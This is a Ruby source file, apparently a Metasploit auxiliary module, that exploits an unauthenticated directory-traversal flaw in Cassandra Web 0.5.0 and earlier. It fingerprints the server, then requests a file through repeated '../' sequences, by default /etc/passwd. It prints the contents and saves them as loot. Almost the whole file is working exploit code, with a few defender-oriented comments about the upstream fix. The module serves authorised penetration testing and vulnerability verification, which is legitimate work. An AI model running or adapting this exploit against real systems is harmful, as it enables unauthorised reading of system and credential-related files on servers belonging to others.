
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cassandra_web_file_read.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
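# Auxiliary scanner module for the unauthenticated directory traversal in
# Cassandra Web described below. It fingerprints the web UI (check_host) and
# then requests one file through a '../' path (run_host), storing the response
# body as loot.
#
# For defenders: the module description attributes the flaw to Rack::Protection
# being disabled, and the first reference is the upstream commit addressing it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient
  prepend Exploit::Remote::AutoCheck

  # Registers module metadata and the FILEPATH / DEPTH / RPORT options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cassandra Web File Read Vulnerability',
        'Description' => %q{
          This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web
          'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
          This vulnerability occurred due to the disabled Rack::Protection module
        },
        'References' => [
          ['URL', 'https://github.com/avalanche123/cassandra-web/commit/f11e47a26f316827f631d7bcfec14b9dd94f44be'],
          ['EDB', '49362']
        ],
        'Author' => [
          'Jeremy Brown', # Vulnerability discovery
          'krastanoel' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          # NOTE(review): the request sent by run_host is a plain GET whose path
          # contains '../' sequences, so it may be recorded in HTTP access logs on
          # the target or on a proxy in front of it. Confirm whether this list
          # should declare IOC_IN_LOGS.
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
        OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 8]),
        # OptPort instead of OptInt so that out-of-range port numbers are rejected
        # when the option is set.
        OptPort.new('RPORT', [true, 'The Cassandra Web port (default: 3000)', 3000])
      ]
    )
  end

  # Fingerprints the target as a Cassandra Web instance.
  #
  # This is an identification check only: it looks at the HTTP status, the
  # Server header and two marker strings in the landing page. It does not
  # read the product version and does not test the traversal itself, which
  # is why a match is reported as Appears.
  #
  # @param _ip [String] host being scanned (unused; the HTTP client uses the datastore)
  # @return [Exploit::CheckCode] Unknown on no response or connection error,
  #   Safe when the page is not recognised, Appears on a fingerprint match
  def check_host(_ip)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/')
    })

    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
    return Exploit::CheckCode::Safe('Target is not a Cassandra Web server') if res.code != 200

    fingerprinted = res.headers['server'] == 'thin' &&
                    res.body.include?('Cassandra Web') &&
                    res.body.include?('/js/cassandra.js')
    return Exploit::CheckCode::Appears('Cassandra Web Detected') if fingerprinted

    Exploit::CheckCode::Safe('Target is not a Cassandra Web server')
  rescue ::Rex::ConnectionError
    Exploit::CheckCode::Unknown('Could not connect to the web service')
  end

  # Requests FILEPATH through DEPTH levels of '../' and stores the response
  # body as loot.
  #
  # @param ip [String] host being scanned; recorded as the loot's host
  # @return [void]
  def run_host(ip)
    depth = datastore['DEPTH']
    # String#* raises ArgumentError on a negative count; report it as a
    # configuration problem instead of an unhandled exception.
    fail_with(Failure::BadConfig, 'DEPTH must not be negative') if depth.negative?

    traversal = '../' * depth
    # Drop a single leading slash. The original test used '^', which in Ruby
    # matches at the start of any line; delete_prefix only looks at the start
    # of the string.
    filename = datastore['FILEPATH'].delete_prefix('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/#{traversal}#{filename}")
    })

    fail_with(Failure::Unreachable, 'Connection failed') unless res
    # A response was received here, so report the status code rather than a
    # connection failure.
    fail_with(Failure::NotVulnerable, "Unexpected HTTP #{res.code} response. Nothing was downloaded") if res.code != 200
    # The landing page references /js/cassandra.js; seeing it here means the
    # application page came back instead of the requested file.
    fail_with(Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter') if res.body.include?('/js/cassandra.js')

    print_status('Downloading file...')
    print_line("\n#{res.body}\n")

    fname = datastore['FILEPATH']

    # The loot entry is recorded as text/plain whatever the file actually is.
    path = store_loot(
      'cassandra.web.traversal',
      'text/plain',
      ip,
      res.body,
      fname
    )
    print_good("File saved in: #{path}")
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end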